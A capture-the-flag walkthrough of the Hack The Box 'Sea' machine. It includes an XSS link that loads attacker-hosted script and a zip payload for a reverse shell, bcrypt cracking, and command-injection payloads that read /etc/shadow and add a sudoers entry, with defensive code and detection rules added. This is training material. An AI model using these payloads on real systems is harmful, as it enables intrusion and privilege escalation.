HTB Sea done
Sea
OS:
Linux
Technology:
WonderCMS version 3.2.0
IP Address:
10.129.138.250
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Users and passwords:
/etc/passwd
amay
geo
---
SSH login - amay
L: amay
P: mychemicalromance
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ sudo nmap -A -sV --script=default -p- -oA IP_nmap 10.129.138.250 ; cat 10.129.138.250_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 14:34 UTC
Nmap scan report for sea.htb (10.129.138.250)
Host is up (0.032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Sea - Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/14%OT=22%CT=1%CU=37468%PV=Y%DS=2%DC=T%G=Y%TM=673
OS:60AC8%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10E%TI=Z%TS=A)SEQ(SP=10
OS:5%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53C
OS:NNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W
OS:3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=N)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNN
OS:SNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 29.14 ms 10.10.14.1
2 29.48 ms sea.htb (10.129.138.250)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds
cat: 10.129.138.250_nmap.nmap: No such file or directory
Add IP to hostname
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ cat /etc/hosts | grep sea
10.129.138.250 sea.htb
Ffuf
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ffuf -u http://10.129.138.250/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.129.138.250_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.138.250/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.138.250_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
0 [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 35ms]
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 34ms]
contact.php [Status: 200, Size: 2731, Words: 821, Lines: 119, Duration: 34ms]
data [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 38ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/data/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 48ms]
index.php [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 47ms]
messages [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 46ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/messages/FUZZ
plugins [Status: 301, Size: 238, Words: 14, Lines: 8, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/plugins/FUZZ
themes [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 35ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/themes/FUZZ
[INFO] Starting queued job on target: http://10.129.138.250/data/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 33ms]
files [Status: 301, Size: 241, Words: 14, Lines: 8, Duration: 42ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/data/files/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 34ms]
[INFO] Starting queued job on target: http://10.129.138.250/messages/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 54ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 48ms]
[INFO] Starting queued job on target: http://10.129.138.250/plugins/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 41ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 55ms]
[INFO] Starting queued job on target: http://10.129.138.250/themes/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 33ms]
bike [Status: 301, Size: 242, Words: 14, Lines: 8, Duration: 41ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/themes/bike/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 32ms]
[INFO] Starting queued job on target: http://10.129.138.250/data/files/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 40ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 35ms]
[INFO] Starting queued job on target: http://10.129.138.250/themes/bike/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 36ms]
LICENSE [Status: 200, Size: 1067, Words: 152, Lines: 22, Duration: 46ms]
README.md [Status: 200, Size: 318, Words: 40, Lines: 16, Duration: 37ms]
css [Status: 301, Size: 246, Words: 14, Lines: 8, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.138.250/themes/bike/css/
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 38ms]
img [Status: 301, Size: 246, Words: 14, Lines: 8, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.138.250/themes/bike/img/
summary [Status: 200, Size: 66, Words: 9, Lines: 2, Duration: 41ms]
theme.php [Status: 500, Size: 227, Words: 37, Lines: 9, Duration: 31ms]
version [Status: 200, Size: 6, Words: 1, Lines: 2, Duration: 34ms]
:: Progress: [143283/143283] :: Job [7/7] :: 847 req/sec :: Duration: [0:02:31] :: Errors: 0 ::
Find version of CMS: WonderCMS v3.2.0
Reading the files that ffuf found deep in the theme directory (themes/bike) revealed the CMS version:
WonderCMS version 3.2.0
---
http://sea.htb/themes/bike/README.md
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
___
http://sea.htb/themes/bike/version
3.2.0
___
http://sea.htb/themes/bike/LICENSE
MIT License
Copyright (c) 2019 turboblack
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Exploit: CVE-2023-41425 - RCE for WonderCMS versions v3.2.0 to v3.4.2
https://github.com/insomnia-jacob/CVE-2023-41425
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ git clone https://github.com/insomnia-jacob/CVE-2023-41425
Cloning into 'CVE-2023-41425'...
remote: Enumerating objects: 41, done.
remote: Counting objects: 100% (41/41), done.
remote: Compressing objects: 100% (37/37), done.
remote: Total 41 (delta 8), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (41/41), 207.19 KiB | 1.92 MiB/s, done.
Resolving deltas: 100% (8/8), done.
Run exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Sea/CVE-2023-41425]
└─$ python3 exploit.py -u http://sea.htb/loginURL -i 10.10.14.117 -r http://10.10.14.117:8000/main.zip
usage: exploit.py [-h] -u URL -i IP -p PORT [-r REMOTE_HOST]
exploit.py: error: the following arguments are required: -p/--port
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Sea/CVE-2023-41425]
└─$ python3 exploit.py -u http://sea.htb/loginURL -i 10.10.14.117 -p 1234 -r http://10.10.14.117:8000/main.zip
================================================================
# Autor : Insomnia (Jacob S.)
# IG : insomnia.py
# X : @insomniadev_
# Github : https://github.com/insomnia-jacob
================================================================
[+]The zip file will be downloaded from the host: http://10.10.14.117:8000/main.zip
[+] File created: xss.js
[+] Set up nc to listen on your terminal for the reverse shell
Use:
nc -nvlp 1234
[+] Send the below link to admin:
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.117:8000/xss.js"></script><form+action="
Starting HTTP server with Python3, waiting for the XSS request
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.199.242 - - [15/Nov/2024 11:53:40] "GET /xss.js HTTP/1.1" 200 -
10.129.199.242 - - [15/Nov/2024 11:53:48] "GET /main.zip HTTP/1.1" 200 -
10.129.199.242 - - [15/Nov/2024 11:53:48] "GET /main.zip HTTP/1.1" 200 -
10.129.199.242 - - [15/Nov/2024 11:53:48] "GET /main.zip HTTP/1.1" 200 -
10.129.199.242 - - [15/Nov/2024 11:53:48] "GET /main.zip HTTP/1.1" 200 -
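The link the exploit prints above works because the page parameter is reflected into the login form's markup without encoding, so a quote closes the attribute and the rest of the value becomes live HTML. The following is an added example (not code from the write-up, the exploit repository or WonderCMS) that shows the bug class next to its fix and a matching access-log detection rule. The two render functions are a simplified stand-in for the template, PAGE_PAYLOAD and SAMPLE_TARGETS are constructed to match the shape of the printed link, and the attacker host is kept only as a string.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed value for the "page" parameter, shaped like the link the exploit
# printed: it closes the surrounding <form> and opens a <script> tag.
# The URL is the attacker-side host from the write-up, kept as a string only.
PAGE_PAYLOAD = 'loginURL?"></form><script src="http://10.10.14.117:8000/xss.js"></script><form action="'


def render_login_form_vulnerable(page: str) -> str:
    """Reflects the page parameter into an HTML attribute with no encoding.
    Simplified stand-in for the bug class, not WonderCMS's actual template."""
    return f'<form action="index.php?page={page}" method="post"><input name="password"></form>'


def render_login_form_hardened(page: str) -> str:
    """Same template with attribute encoding: quotes and angle brackets in the
    parameter can no longer terminate the attribute or the tag."""
    safe = html.escape(page, quote=True)
    return f'<form action="index.php?page={safe}" method="post"><input name="password"></form>'


# Markup that has no business in a query parameter expected to hold a page slug.
SUSPICIOUS = re.compile(r"<\s*/?\s*(script|form|iframe|img|svg)\b|javascript:", re.IGNORECASE)


def flag_request(target: str) -> bool:
    """Detection rule for web-server access logs: URL-decode the request target
    first (browsers send the payload as %22%3E%3Cscript...), then look for
    injected markup."""
    return SUSPICIOUS.search(unquote_plus(target)) is not None


# Constructed request targets in the shape an access log would record them.
SAMPLE_TARGETS = [
    "/index.php?page=home",
    "/index.php?page=loginURL",
    "/index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://10.10.14.117:8000/xss.js%22%3E%3C/script%3E%3Cform+action=%22",
]


def flagged_targets(targets=SAMPLE_TARGETS):
    """Return the request targets a log review should escalate."""
    return [t for t in targets if flag_request(t)]


if __name__ == "__main__":
    print(render_login_form_vulnerable(PAGE_PAYLOAD))
    print(render_login_form_hardened(PAGE_PAYLOAD))
    print(flagged_targets())
```

Run it and compare the two rendered forms: the vulnerable one contains a real script element, the hardened one contains only the text &lt;script. The detector decodes before matching, which is what makes the third sample target stand out from the two legitimate ones.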
Revshell
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.117] from (UNKNOWN) [10.129.199.242] 42230
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
11:53:48 up 13:29, 0 users, load average: 0.95, 1.03, 1.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ echo $SHELL
$ script /dev/null -c /bin/bash
Script started, file is /dev/null
www-data@sea:/$
www-data@sea:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@sea:/$
Find hash in file: database.js
Read file: /var/www/sea/data/database.js
I found an interesting row containing a bcrypt password hash:
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
---
www-data@sea:/var/www/sea/data$ cat database.js
cat database.js
{
"config": {
"siteTitle": "Sea",
"theme": "bike",
"defaultPage": "home",
"login": "loginURL",
"forceLogout": false,
"forceHttps": false,
"saveChangesPopup": false,
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
"lastLogins": {
"2024\/11\/15 11:53:40": "127.0.0.1",
"2024\/11\/15 11:48:10": "127.0.0.1",
"2024\/11\/15 11:45:39": "127.0.0.1",
"2024\/11\/15 11:41:09": "127.0.0.1",
"2024\/11\/15 11:39:39": "127.0.0.1"
},
"lastModulesSync": "2024\/11\/15",
"customModules": {
"themes": {},
"plugins": {}
},
"menuItems": {
"0": {
"name": "Home",
"slug": "home",
"visibility": "show",
"subpages": {}
},
"1": {
"name": "How to participate",
"slug": "how-to-participate",
"visibility": "show",
"subpages": {}
}
},
"logoutToLoginScreen": {}
},
"pages": {
"404": {
"title": "404",
"keywords": "404",
"description": "404",
"content": "<center><h1>404 - Page not found<\/h1><\/center>",
"subpages": {}
},
"home": {
"title": "Home",
"keywords": "Enter, page, keywords, for, search, engines",
"description": "A page description is also good for search engines.",
"content": "<h1>Welcome to Sea<\/h1>\n\n<p>Hello! Join us for an exciting night biking adventure! We are a new company that organizes bike competitions during the night and we offer prizes for the first three places! The most important thing is to have fun, join us now!<\/p>",
"subpages": {}
},
"how-to-participate": {
"title": "How to",
"keywords": "Enter, keywords, for, this page",
"description": "A page description is also good for search engines.",
"content": "<h1>How can I participate?<\/h1>\n<p>To participate, you only need to send your data as a participant through <a href=\"http:\/\/sea.htb\/contact.php\">contact<\/a>. Simply enter your name, email, age and country. In addition, you can optionally add your website related to your passion for night racing.<\/p>",
"subpages": {}
}
},
"blocks": {
"subside": {
"content": "<h2>About<\/h2>\n\n<br>\n<p>We are a company dedicated to organizing races on an international level. Our main focus is to ensure that our competitors enjoy an exciting night out on the bike while participating in our events.<\/p>"
},
"footer": {
"content": "©2024 Sea"
}
}
}www-data@sea:/var/www/sea/data$
Cracking hash
Before running john we have to remove the backslashes from the hash copied out of database.js: the \/ sequences are JSON escapes for / and are not part of the hash.
From
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q
To
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ john database.js --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:23 DONE (2024-11-15 12:39) 0.04189g/s 128.1p/s 128.1c/s 128.1C/s iamcool..memories
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ cat database.js
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
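Added example (not from the write-up): reading the hash out of database.js with a JSON parser instead of editing backslashes by hand, and splitting the bcrypt string into its fields. The parse explains the "Cost 1 (iteration count) is 1024" line john printed: the 10 in $2y$10$ is a log2 work factor, and 2**10 = 1024. DATABASE_JS is a constructed excerpt carrying the hash shown above; the cost floor of 12 in cost_is_adequate is an assumption for the example, not a WonderCMS default.

```python
import json
import re

# Constructed excerpt of WonderCMS's database.js with the fields relevant here.
# The hash is the one shown in the write-up; note the JSON-escaped slashes (\/).
DATABASE_JS = r'''{
  "config": {
    "siteTitle": "Sea",
    "login": "loginURL",
    "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q"
  }
}'''

# Modular-crypt bcrypt layout: $<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")


def extract_password_hash(database_js: str) -> str:
    """Pull the admin hash out of database.js with a JSON parser. json.loads()
    turns the escape sequence \\/ back into /, so no manual backslash editing
    is needed (a stray edit would silently corrupt the hash)."""
    return json.loads(database_js)["config"]["password"]


def parse_bcrypt(hash_str: str) -> dict:
    """Split a bcrypt string into its fields and derive the work factor.
    The cost is a log2 value: cost 10 means 2**10 = 1024 rounds, which is the
    'iteration count is 1024' john reports when it loads the hash."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    variant, cost, salt, digest = m.groups()
    return {
        "variant": variant,
        "cost": int(cost),
        "iterations": 2 ** int(cost),
        "salt": salt,
        "digest": digest,
    }


def cost_is_adequate(hash_str: str, minimum_cost: int = 12) -> bool:
    """Defender-side check: flag stored hashes below a chosen cost floor.
    The floor of 12 is an assumption for this example, not a WonderCMS default."""
    return parse_bcrypt(hash_str)["cost"] >= minimum_cost


if __name__ == "__main__":
    h = extract_password_hash(DATABASE_JS)
    print(h)
    print(parse_bcrypt(h))
    print("cost adequate:", cost_is_adequate(h))
```

The parsed cost is also why the rockyou run above finished in seconds at about 128 passwords per second per thread: cost 10 is cheap enough that a dictionary password falls quickly, and the real defence is the password, not the hash format.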
SSH login - amay
L: amay
P: mychemicalromance
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ssh amay@sea.htb
The authenticity of host 'sea.htb (10.129.199.242)' can't be established.
ED25519 key fingerprint is SHA256:xC5wFVdcixOCmr5pOw8Tm4AajGSMT3j5Q4wL6/ZQg7A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'sea.htb' (ED25519) to the list of known hosts.
amay@sea.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 15 Nov 2024 12:40:28 PM UTC
System load: 1.77 Processes: 252
Usage of /: 67.9% of 6.51GB Users logged in: 0
Memory usage: 11% IPv4 address for eth0: 10.129.199.242
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Aug 5 07:16:49 2024 from 10.10.14.40
Read flag: user.txt
amay@sea:~$ cd ~
amay@sea:~$ ls -a
. .. .bash_history .bash_logout .bashrc .cache .profile .ssh user.txt
amay@sea:~$ cat user.txt
759f924468736b9b92e06938d8c86b18
amay@sea:~$
Privilege Escalation
Listening services on the remote host
amay@sea:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:48609 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
amay@sea:~$ curl http://127.0.0.1:8080
Unauthorized accessamay@sea:~$
amay@sea:~$
amay@sea:~$ curl -u "amay:mychemicalromance" -I http://127.0.0.1:8080
HTTP/1.1 200 OK
Host: 127.0.0.1:8080
Date: Fri, 15 Nov 2024 13:13:04 GMT
Connection: close
X-Powered-By: PHP/7.4.3-4ubuntu2.23
Content-type: text/html; charset=UTF-8
Create SSH tunnel
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ssh -N -L 8081:localhost:8080 amay@sea.htb
amay@sea.htb's password:
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ss -tulpn | grep 8081
tcp LISTEN 0 128 127.0.0.1:8081 0.0.0.0:* users:(("ssh",pid=303550,fd=5))
tcp LISTEN 0 128 [::1]:8081 [::]:* users:(("ssh",pid=303550,fd=4))
Open website: http://127.0.0.1:8081/
Command injection
Payload for the log_file form field (URL-decoded: /etc/shadow && id& id):
log_file=/etc/shadow+%26%26+id%26+id&analyze_log=
---
POST / HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8081/
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://127.0.0.1:8081
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
log_file=/etc/shadow+%26%26+id%26+id&analyze_log=
Grant amay passwordless sudo via /etc/sudoers.d
Payload (writes the line amay ALL=(ALL) NOPASSWD: ALL to /etc/sudoers.d/amay):
log_file=/etc/shadow+%26%26+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#&analyze_log=
---
POST / HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8081/
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://127.0.0.1:8081
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
log_file=/etc/shadow+%26%26+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#&analyze_log=
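Both payloads above succeed for the same reason: the log_file value is concatenated into a shell command, so && and & become shell operators. The following is an added example, not code from the write-up or from the monitoring app on port 8080 (whose source is not shown), contrasting that pattern with a handler that never invokes a shell, restricts the value to a plain file name inside an allowed directory, and carries a detection rule for the POST body. ALLOWED_LOG_DIR and the grep -c command are assumptions for the example; the request bodies it is run against are the two captured above plus constructed benign and traversal inputs.

```python
import posixpath
import re
from urllib.parse import parse_qs

# Directory the log-analysis feature is allowed to read from. An assumption
# for this example: the monitoring app's source is not shown in the write-up.
ALLOWED_LOG_DIR = "/var/log"

# Characters that let a value break out of a shell word. A file-name field
# never legitimately contains them.
SHELL_META = re.compile(r"""[;&|`$<>\n\r(){}\\"']""")


def build_command_vulnerable(log_file: str) -> str:
    """The pattern behind the injection: the form value is pasted into a shell
    string, so '&&' and '&' inside it are parsed by the shell as operators.
    Shown for contrast only; never hand the result to os.system()/shell=True."""
    return f"cat {log_file} | grep -c ."


def looks_like_injection(value: str) -> bool:
    """Detection rule for WAF or access-log review of the POST body."""
    return SHELL_META.search(value) is not None


def build_command_hardened(log_file: str, allowed_dir: str = ALLOWED_LOG_DIR) -> list:
    """Return an argv list for subprocess.run(argv) with shell=False, or raise
    ValueError. No shell is involved, the value must be a plain file name, and
    the normalised path must stay inside allowed_dir."""
    if not re.fullmatch(r"[A-Za-z0-9_.-]+", log_file):
        raise ValueError("log_file must be a plain file name")
    full = posixpath.normpath(posixpath.join(allowed_dir, log_file))
    if posixpath.dirname(full) != posixpath.normpath(allowed_dir):
        raise ValueError("log_file escapes the allowed directory")
    return ["grep", "-c", ".", full]


def handle_post_body(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body like the captured request
    and decide whether the hardened handler would serve or reject it."""
    params = parse_qs(body, keep_blank_values=True)
    log_file = params.get("log_file", [""])[0]
    if looks_like_injection(log_file):
        return {"log_file": log_file, "verdict": "rejected", "reason": "shell metacharacters"}
    try:
        argv = build_command_hardened(log_file)
    except ValueError as exc:
        return {"log_file": log_file, "verdict": "rejected", "reason": str(exc)}
    return {"log_file": log_file, "verdict": "allowed", "argv": argv}


if __name__ == "__main__":
    # The two captured bodies from the write-up plus a constructed benign one.
    for body in (
        "log_file=/etc/shadow+%26%26+id%26+id&analyze_log=",
        'log_file=/etc/shadow+%26%26+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#&analyze_log=',
        "log_file=auth.log&analyze_log=",
    ):
        print(handle_post_body(body))
```

The order of checks matters for triage: the metacharacter rule fires on both captured payloads and is cheap enough to run on every request, while the path checks catch the quieter traversal variants (../ or a bare ..) that contain no shell syntax at all. Building argv as a list and passing it to subprocess.run without shell=True is the actual fix; the detection rule is only a compensating control.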
Read flag: root.txt
amay@sea:~$ sudo -l
Matching Defaults entries for amay on sea:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User amay may run the following commands on sea:
(ALL) NOPASSWD: ALL
amay@sea:~$
amay@sea:~$ sudo -i
root@sea:~#
root@sea:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sea:~# cd /root
root@sea:~#
root@sea:~# ls -a
. .bash_history .cache .pki root.txt .ssh
.. .bashrc monitoring .profile scripts .viminfo
root@sea:~# cat root.txt
4caa4aa524beda44cf5c49077a7d9fe1
root@sea:~#
References
[CVE-2023-41425 - RCE for WonderCMS versions v3.2.0 to v3.4.2]( https://github.com/insomnia-jacob/CVE-2023-41425)
Lessons Learned